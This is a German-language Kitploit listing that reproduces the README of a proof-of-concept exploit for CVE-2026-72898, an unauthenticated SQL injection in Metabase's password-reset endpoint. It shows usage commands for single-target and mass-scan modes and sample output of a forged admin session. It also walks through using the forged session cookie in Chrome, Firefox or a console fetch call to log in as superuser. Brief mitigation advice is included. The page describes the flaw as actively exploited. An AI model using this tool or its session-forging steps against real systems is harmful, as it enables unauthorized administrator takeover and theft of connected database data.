Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-72898 — Proof-of-Concept-Exploit für CVE-2026-72898, eine nicht authentifizierte SQL-Injection im Passwort-Reset-Endpunkt von Metabase. Erstellt eine Admin-Sitzung zur vollständigen Übernahme, mit Einzelziel- und Massen-Scan-Modi für autorisierte Tests. | Kitploit
Tools/GitHubGitHub/4minx/cve-2026-72898
SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHub4minx/cve-2026-72898

CVE-2026-72898

Proof-of-Concept-Exploit für CVE-2026-72898, eine nicht authentifizierte SQL-Injection im Passwort-Reset-Endpunkt von Metabase. Erstellt eine Admin-Sitzung zur vollständigen Übernahme, mit Einzelziel- und Massen-Scan-Modi für autorisierte Tests.

Repository anzeigen
1vor 6 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-72898 PoC : Metabase Unauthentifizierte SQL-Injection

Pre-Authentifizierungs-SQL-Injection in Metabase, die zur Admin-Übernahme führt

Proof-of-Concept für CVE-2026-72898, eine kritische, nicht authentifizierte SQL-Injection im Passwort-Reset-Endpunkt von Metabase. Der PoC injiziert eine gefälschte Admin-Sitzungszeile in die Tabelle core_session und verwendet sie anschließend, um eine vollständige Administrator-Sitzung ohne jegliche Anmeldedaten zu validieren.

Hinweis: Dieser PoC ist ausschließlich für autorisierte Sicherheitstests und Forschung gedacht. CVE-2026-72898 ist im Katalog der CISA Known Exploited Vulnerabilities (KEV) aufgeführt und wird derzeit aktiv in freier Wildbahn ausgenutzt. Sie sind dafür verantwortlich, alle geltenden Gesetze einzuhalten und vor dem Testen eines Systems eine schriftliche Genehmigung einzuholen.


Informationen zur Schwachstelle

  • CVE: CVE-2026-72898
  • Typ: CWE-89 Unsachgemäße Neutralisierung spezieller Elemente, die in einem SQL-Befehl verwendet werden ('SQL Injection')
  • CVSS 4.0: 10.0 (Kritisch)
  • Authentifizierung: Nicht authentifiziert (Pre-Auth, remote, geringe Angriffskomplexität)
  • CISA KEV: Hinzugefügt am 2026-08-11 (aktive Ausnutzung)
  • Betroffen (Metabase):
    • x.58.0 bis < x.58.24
    • x.59.0 bis < x.59.21
    • x.60.0 bis < x.60.17
    • x.61.0 bis < x.61.11
    • x.62.0 bis < x.62.9
    • x.63.0 bis < x.63.5
  • Behoben in: x.58.24, x.59.21, x.60.17, x.61.11, x.62.9, x.63.5

Voraussetzungen

  • Python 3.8+ mit der Bibliothek requests
  • Ziel: eine betroffene, aus dem Internet erreichbare Metabase-Instanz

Abhängigkeiten installieren:

root@kitploit:~
pip install requests

Verwendung

Einzelnes Ziel

root@kitploit:~
python cve-2026-72898_poc.py -t http://192.168.1.1:3000

Massen-Scan

root@kitploit:~
python cve-2026-72898_poc.py -T targets.txt

Optionen


Beispielausgabe

root@kitploit:~
 CVE-2026-72898 | Metabase SQLi PoC
----------------------------------------

Target: http://192.168.1.1:3000
 [1] GET http://192.168.1.1:3000/ -> 200
 [2] POST /api/session/reset_password -> 400
      (expected: Invalid reset token, SQLi executed)
 [3] GET /api/user/current -> 200
[+] VULNERABLE
    session id : 242x6a6cx-5388-aaf8-bl5c-afi46ic02198
    key_hashed : 0f6005cbexf08948c08dd9272b439xfecwabxb4ntedd83bagb6337bx849b6xyi6
    admin email: [email protected]

Ein 400 bei Schritt 2 mit Invalid reset token ist erwartet — er bedeutet, dass die SQLi-Payload ausgeführt und die Antwort kurzgeschlossen wurde. Schritt 3, der 200 auf /api/user/current zurückgibt, bestätigt, dass die gefälschte Sitzung gültig ist.

Ergebnisstatus: vulnerable | not_vulnerable | patched | root_not_200 | unknown | error


Verwenden der gefälschten Sitzung

root@kitploit:~

Metabase reads its session from the `metabase.SESSION` cookie, so you can log in to the web UI as the forged admin by adding that cookie:

**Google Chrome / Edge / Chromium**

1. Run the PoC and copy the printed `session id`
2. Open `http://TARGET/` and press `F12` (DevTools)
3. Go to **Application** (in Edge: **Application**; in Chrome: **Application**) &rarr; **Storage** &rarr; **Cookies** &rarr; select the target host
4. Click the **+** (Add cookie) button and fill in:
   - **Name**: `metabase.SESSION`
   - **Value**: `<SESSION_ID>` (the value printed by the PoC)
   - **Domain**: the target host/IP (e.g. `192.168.1.1` or `.example.com`)
   - **Path**: `/`
   - Set an expiration far in the future (or click "Session")
5. Click **Save**, then refresh the page
6. You are now authenticated as the superuser &mdash; the admin gear icon will be visible

**Firefox**

1. Run the PoC and copy the printed `session id`
2. Press `F12` &rarr; **Storage** tab &rarr; **Cookies** &rarr; select the target host
3. Right-click &rarr; **Add/Edit Cookie** and add:
   - **Name**: `metabase.SESSION`
   - **Value**: `<SESSION_ID>`
   - **Path**: `/`
   - **HttpOnly**: unchecked (JS sets it)
   - **Secure**: unchecked for plain HTTP
4. Save and refresh the page

**Alternative: cookie editor extension**

Use any cookie-editing extension (e.g. Cookie-Editor) to add the `metabase.SESSION` cookie with the forged value on the target domain, then refresh.

**From the browser console**

```js
fetch('/api/user/current', { headers: { 'X-Metabase-Session': '<SESSION_ID>' } })
  .then(r => r.json()).then(console.log)

Gegenmaßnahmen

  • Upgrade auf eine gepatchte Version (x.58.24 / x.59.21 / x.60.17 / x.61.11 / x.62.9 / x.63.5 oder neuer)
  • Falls Sie nicht sofort upgraden können, blockieren Sie /api/session/reset_password auf der Netzwerk-/WAF-Ebene
  • Nach dem Upgrade: widerrufen Sie alle aktiven Sitzungen, rotieren Sie die Anmeldedaten für verbundene Datenbanken, überprüfen Sie Admin-Konten und API-Schlüssel auf unerwartete Änderungen und prüfen Sie die Metabase-Aktivitäts-/Abfragehistorie.

☕ Unterstützung

Wenn Ihnen dieses Projekt geholfen hat, erwägen Sie, seine Entwicklung zu unterstützen:

USDT (TRC-20)

TDCPYioWbZW4iyMCuHhJeFsUZJ88YqZWc1

USDT TRC-20 QR

ETH (ERC-20)

0xf6eA555f95ed5b356fF7a90E6461EbBF6ce105cE

Ethereum QR

Referenzen

  • Metabase-Sicherheitshinweis (GHSA-vwf4-m7j8-wcjf)
  • Metabase-Sicherheitsupdate
  • CVE.org-Eintrag – CVE-2026-72898
  • NVD – CVE-2026-72898
  • CISA-Katalog der bekannten ausgenutzten Schwachstellen
  • Horizon3.ai – Metabase SQL Injection
  • The Hacker News – Metabase-Zero-Day in freier Wildbahn ausgenutzt
  • Nuclei-Template – Metabase Unauthentifizierte SQL-Injection
Tool herunterladen
ArgumentBeschreibungStandard
-t, --targetEinzelne Ziel-URL-
-T, --targetsDatei mit Ziel-URLs, eine pro Zeile-
-o, --outputErgebnisdatei (tabulatorgetrennt: target, result, status, session_id, admin_email)-
--timeoutRequest-Timeout in Sekunden15